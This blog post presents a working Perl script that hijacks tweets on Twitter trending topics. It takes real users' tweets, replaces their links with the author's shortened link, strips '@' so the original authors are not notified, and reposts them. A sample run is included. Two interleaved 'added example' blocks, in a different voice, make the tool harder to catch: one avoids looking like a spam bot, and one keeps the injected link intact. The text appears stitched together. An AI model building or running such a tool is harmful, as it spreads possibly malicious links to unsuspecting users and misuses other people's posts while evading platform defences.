Hijacking Links in Trending Topics within Twitter

I have been doing a little bit of work on how easily Twitter users can be redirected to URLs they never intended to visit. This is concerning, since a link planted this way has a good chance of being a malicious one.

I have created a quick Perl script that does the following:

  • Grabs the top trends from Twitter's trends JSON feed
  • Searches for tweets that contain links and mention each of the top trends
  • Picks one of the first ten search results at random and replaces the link the original user tweeted with our shortened link to the new destination
    • There is the option of chaining multiple URL shorteners, as discussed in my other blog entry.
    • We also strip the '@' from the text, so the original tweeter is not @mentioned and gets no notification that their tweet was retweeted with our link in it
  • Tweets the 'hijacked' text back to Twitter

Since we are grabbing the trending topics and injecting our link into tweets that people are already posting about them, there is a good chance of people clicking through. You may notice that there are already spam bots out there that tweet a link with every other trending topic stuffed into the tweet as well, which is pretty easy to spot. A way around this would be to check our array of candidate tweets and see whether any other trending topics appear in a given tweet; if they do, choose another one. I haven't implemented this since I lost motivation on the project, but it could easily be done.
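Here is how that cross-trend filter could look, as an added example in Perl that is not part of the original script. The trend names and the first candidate tweet are copied from the sample run below; the other two candidates are constructed for the example, and the way a trend name is matched in a tweet (plain words, "#Word #Word" and "#wordword" hashtag forms) is my assumption, since the API only hands back the plain name. It goes slightly beyond the idea in the text by also requiring that the chosen tweet mention the current trend and carry a link, so the script has something to replace.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Constructed sample data for this example, not live API output. The trend
# names and the first candidate tweet are copied from the sample run below;
# the other two candidates are made up to show a tweet that passes and a
# tweet without a link.
my @trends = ('Macaulay Culkin', 'PowerBalance Admits Their',
              'Quentin Tarantino', 'HEAVEN SHALL BURN');
my $current    = 'Quentin Tarantino';
my @candidates = (
    '.. Amazing optical illusion that works ONLY for man?! http://tinyurl.com/2dxm9p8 #Macaulay #Culkin #Quentin #Tarantino #HEAVEN #SHALL #BURN',
    'Quentin Tarantino talks about his next film http://example.com/tarantino',
    'Tarantino fans everywhere, but no link in this one',
);

# Turn a trend name into a case-insensitive regex that also matches the
# hashtag forms spammers use: "Quentin Tarantino", "#Quentin #Tarantino"
# and "#quentintarantino". (Assumed forms; the API only gives the plain name.)
sub trend_regex {
    my ($name) = @_;
    $name =~ s/#//g;
    my $pat = join '\s*#?', map { quotemeta } split /\s+/, $name;
    return qr/(?<!\w)#?${pat}(?!\w)/i;
}

# Return the first *other* trend named in the tweet, or undef if it is clean.
sub mentions_other_trend {
    my ($tweet, $current, $trends) = @_;
    for my $t (@$trends) {
        next if lc $t eq lc $current;
        my $re = trend_regex($t);
        return $t if $tweet =~ $re;
    }
    return;
}

# Pick one tweet at random from the candidates that (a) carries a link we can
# replace, (b) actually mentions the current trend and (c) names no other
# trend. Returns undef when nothing qualifies so the caller can skip the trend
# instead of posting something that looks like every other trend-stuffing bot.
sub pick_clean_tweet {
    my ($current, $trends, $candidates) = @_;
    my $want  = trend_regex($current);
    my @clean = grep {
        m{https?://\S+}
        && $_ =~ $want
        && !mentions_other_trend($_, $current, $trends)
    } @$candidates;
    return unless @clean;
    return $clean[int rand @clean];
}

for my $t (@candidates) {
    my $other = mentions_other_trend($t, $current, \@trends);
    print defined $other ? "rejected (also names '$other'): " : "no other trend named: ",
          substr($t, 0, 50), "...\n";
}
my $pick = pick_clean_tweet($current, \@trends, \@candidates);
print "chosen: ", (defined $pick ? $pick : '(none, skip this trend)'), "\n";
```

Dropped into the script, pick_clean_tweet would replace the random pick from @searchresults; the first candidate is rejected because it also names Macaulay Culkin (and HEAVEN SHALL BURN), the third has no link, so only the second is eligible.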

Sample run:

MB-PR0:twitter-proj jgilmour$ ./twitinject.pl
----------------------------------
-- Twitter Link Injector v0.1 ----
----------------------------------
usage: ./twitinject.pl <link>
example: ./twitinject.pl http://www.google.com
MB-PR0:twitter-proj jgilmour$ ./twitinject.pl http://techsmog.com/?p=52
url (encoded): http%3A%2F%2Ftechsmog%2Ecom%2F%3Fp%3D52
url (shortened): http://easyuri.com/e13a1
----------------------------------
-- Twitter Link Injector v0.1 ----
----------------------------------
Top Trend #1: Macaulay Culkin
----------------------------------
original tweet: Mila Kunis &amp; Macaulay Culkin SPLIT: Breakup For Actor Actress  http://tiny.ly/DAM0
size: 91
sending injected tweet: Mila Kunis &amp; Macaulay Culkin SPLIT: Breakup For Actor Actress  http://easyuri.com/e13a1
----------------------------------
Top Trend #2: PowerBalance Admits Their
----------------------------------
original tweet: RT @Gizmodo: PowerBalance Admits Their Wristbands Are a Scam http://gizmodo.com/5723577/
size: 84
sending injected tweet: RT Gizmodo: PowerBalance Admits Their Wristbands Are a Scam http://easyuri.com/e13a1
----------------------------------
Top Trend #3: Quentin Tarantino
----------------------------------
original tweet: .. Amazing optical illusion that works ONLY for man?! http://tinyurl.com/2dxm9p8 #Macaulay #Culkin #Quentin #Tarantino #HEAVEN #SHALL #BURN
size: 137
sending injected tweet: .. Amazing optical illusion that works ONLY for man?! http://easyuri.com/e13a1 #Macaulay #Culkin #Quentin #Tarantino #HEAVEN #SHALL #BURN
----------------------------------
Top Trend #4: Craigs List Killer
----------------------------------
original tweet: Need a Craigs List Killer?: About The Craigslist Killer The storyline of Boston University med student Philip Ma… http://bit.ly/fsFEha
size: 140
sending injected tweet:  a Craigs List Killer?: About The Craigslist Killer The storyline of Boston University med student Philip Ma… http://easyuri.com/e13a1
----------------------------------
Top Trend #5: Sanaa Lathan
----------------------------------
original tweet: ‘Glee’ and women’s sports #Sanaa #Lathan http://bit.ly/e24SqO
size: 65
sending injected tweet: ‘Glee’ and women’s sports #Sanaa #Lathan http://easyuri.com/e13a1
----------------------------------
Top Trend #6: Pete Postlethwaite
----------------------------------
original tweet: Pete Postlethwaite Dies http://www.people.com/people/article/0,,20454333,00.html What a phenomenal actor…
size: 78
sending injected tweet: Pete Postlethwaite Dies http://easyuri.com/e13a1 What a phenomenal actor…
----------------------------------
Top Trend #7: CONFIESO PUBLICAMENTE
----------------------------------
original tweet: FUBB 5 death car crash OMG… WTF is THIS? http://alturl.com/pjre3 Noel Kahn Dead Birds Drop PowerBalance Admits Their CONFIESO PUBLICAMENTE
size: 141
sending injected tweet:  5 death car crash OMG… WTF is THIS? http://easyuri.com/e13a1 Noel Kahn Dead Birds Drop PowerBalance Admits Their CONFIESO PUBLICAMENTE
----------------------------------
Top Trend #8: HEAVEN SHALL BURN
----------------------------------
original tweet: GRITEIIIIIIIII http://newmetaldiscs3.blogspot.com/2011/01/as-i-lay-dying-heaven-shall-burn-south.html
size: 39
sending injected tweet: GRITEIIIIIIIII http://easyuri.com/e13a1
----------------------------------
Top Trend #9: Harlem Globetrotters
----------------------------------
original tweet: Know everything about Harlem Globetrotters http://toptoptopics.com/harlem-globetrotters/ #harlemglobetrotters
size: 88
sending injected tweet: Know everything about Harlem Globetrotters http://easyuri.com/e13a1 #harlemglobetrotters
----------------------------------
Top Trend #10: Angelica Rivera
----------------------------------
original tweet: http://mujeresmas.com/2009/10/tweets-de-angelica-rivera-circulan-por-la-red/
size: 24
sending injected tweet: http://easyuri.com/e13a1
----------------------------------

Screen shot (From Twitter):

Code:

#!/usr/bin/perl
use strict;
use warnings;

use LWP::Simple;
use JSON::XS;
use Net::Twitter::Lite;

# OAuth credentials for the account that will post; get them from dev.twitter.com
my $nt = Net::Twitter::Lite->new(
	consumer_key        => 'CHANGEME',
	consumer_secret     => 'CHANGEME',
	access_token        => 'CHANGEME',
	access_token_secret => 'CHANGEME'
);

if ($#ARGV != 0) {
	print "----------------------------------\n";
	print "-- Twitter Link Injector v0.1 ----\n";
	print "----------------------------------\n";
	print "usage: ./twitinject.pl <link>\n";
	print "example: ./twitinject.pl http://www.google.com\n";
	exit;
}

binmode STDOUT, ":utf8";

# shorten the destination once; this is the link injected into every tweet
my $injectedurl = obfus($ARGV[0]);

# json url for top trends
my $trendsurl = "http://search.twitter.com/trends.json";
my $gettrend  = JSON::XS->new->decode(get($trendsurl));
my @toptentrends;   # 1-based, matching the "Top Trend #n" numbering below
my $x = 1;

print "----------------------------------\n";
print "-- Twitter Link Injector v0.1 ----\n";
print "----------------------------------\n\n";

# get the trends and assign to $toptentrends[$x]
# parse out the '#' as well, for searching
foreach my $thing (@{ $gettrend->{trends} }) {
	$toptentrends[$x] = $thing->{name};
	$toptentrends[$x] =~ s/#//g;
	$x++;
}

# do a search for each of the top ten trends and get the tweets with links
for my $count (1 .. 10) {
	my $trend = $toptentrends[$count];
	last unless defined $trend;   # fewer than ten trends came back

	my $searchurl = "http://search.twitter.com/search.json?q="
	              . urlencode($trend) . "%20filter:links";
	my $getsearches   = JSON::XS->new->decode(get($searchurl));
	my @searchresults = map { $_->{text} } @{ $getsearches->{results} };

	print "Top Trend #$count: $trend\n";
	print "----------------------------------\n";
	unless (@searchresults) {
		print "no tweets with links found, skipping\n";
		print "----------------------------------\n";
		next;
	}

	# we pick a random tweet from the first ten results (the search API usually
	# returns more than ten, but don't rely on it)
	my $pool = @searchresults < 10 ? scalar(@searchresults) : 10;
	my $wah  = $searchresults[int(rand($pool))];
	print "original tweet: $wah\n";

	# swap every http:// link in the tweet for ours, and strip '@' so the
	# original author gets no mention/retweet notification
	$wah =~ s!http://\S+!$injectedurl!gi;
	$wah =~ s!@!!g;
	print "size: " . length($wah) . "\n";

	# we check to see if the length is over 140 chars.
	# if it is, we subtract characters to make it fit: this crude cut keeps 140
	# characters starting at offset 4, so the first four characters are lost
	# (that is why "Need" and "FUBB" vanish in the sample run)
	if (length($wah) >= 140) {
		$wah = substr($wah, 4, 140);
	}
	print "sending injected tweet: $wah\n";
	my $rez = eval { $nt->update($wah) };
	warn "$@\n" if $@;
	print "----------------------------------\n";
}

# shorten the link with easyuri.com; the earlier shortener (mrte.ch) got shut
# down, its call is left commented out and can be edited to re-enable it
sub obfus {
	#my $request = "http://api.mrte.ch/go.php?action=shorturl&url=" . urlencode($_[0]) . "&format=simple";
	#my $url2 = get($request);
	my $encoded = urlencode($_[0]);   # encode exactly once; encoding twice hands the API a %25-mangled link
	print "url (encoded): $encoded \n";
	my $short = get("http://easyuri.com/api.php?link=$encoded");
	die "shortener returned nothing for $_[0]\n" unless defined $short && length $short;
	chomp $short;
	print "url (shortened): $short \n";
	return $short;
}

# percent-encode everything but [A-Za-z0-9_]; turn wide characters into UTF-8 bytes first
sub urlencode {
	my $URL = $_[0];
	utf8::encode($URL) if utf8::is_utf8($URL);
	$URL =~ s/(\W)/sprintf("%%%02X", ord($1))/eg;
	return $URL;
}
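The length check at the end of the loop is the weak spot: substr($wah, 4, 140) throws away the first four characters whether or not anything needs trimming (the sample run shows "Need" and "FUBB" vanishing), fires at exactly 140 characters, and can cut through the injected link when the link sits near the end of the text. The fit_tweet routine below is an added example of my own, not code from the original script, that trims the text around the link instead and leaves the link untouched; the 141-character input is rebuilt from the sample run with a three-dot ellipsis and is constructed input for the example.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Cut $s down to $n characters; if the cut lands inside a word, drop the fragment.
sub cut_words {
    my ($s, $n) = @_;
    return $s if length($s) <= $n;
    my $cut = substr($s, 0, $n);
    $cut =~ s/\S+$// if substr($s, $n, 1) =~ /\S/;
    return $cut;
}

# Fit a tweet into $max characters (140 by default) without touching the
# injected link: trim the text after the link first, then the text before it,
# and never throw away the start of the tweet unless there is no other choice.
sub fit_tweet {
    my ($text, $max) = @_;
    $max = 140 unless defined $max;
    return $text if length($text) <= $max;   # nothing to do at exactly 140

    my ($pre, $link, $post) = $text =~ m{^(.*?)(https?://\S+)(.*)$}s;
    # no link in the text: plain cut from the end, not from the front
    return substr($text, 0, $max) unless defined $link;

    my $room = $max - length($link);         # characters left for the surrounding text
    return $link if $room <= 0;              # the link alone fills the tweet

    if (length($pre) + length($post) > $room) {
        my $post_room = $room - length($pre);
        $post = $post_room > 0 ? cut_words($post, $post_room) : '';
        if (length($pre) > $room) {
            $pre = cut_words($pre, $room - 1);
            $pre =~ s/\s*$/ /;               # keep one space between the text and the link
        }
    }
    my $out = $pre . $link . $post;
    $out =~ s/\s+$//;
    return $out;
}

# Constructed input: the 141-character injected tweet from the sample run,
# rebuilt with a three-dot ellipsis so the length is reproducible here.
my $link  = 'http://easyuri.com/e13a1';
my $tweet = "FUBB 5 death car crash OMG... WTF is THIS? $link Noel Kahn Dead Birds Drop PowerBalance Admits Their CONFIESO PUBLICAMENTE";

my $fitted = fit_tweet($tweet, 140);
print "before (", length($tweet), "): $tweet\n";
print "after  (", length($fitted), "): $fitted\n";
```

On this input the trailing "PUBLICAMENTE" is dropped and the link and the leading "FUBB" survive; the 140-character "Need a Craigs List Killer?" tweet from the sample run would pass through unchanged, where the original cut dropped its leading "Need".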

You will need to edit the consumer_key, consumer_secret, access_token, and access_token_secret fields with the values you get when you register an application at dev.twitter.com. These are the OAuth credentials of the account that will post the tweets, so keep the real ones out of any copy of the script you share. That's all folks!
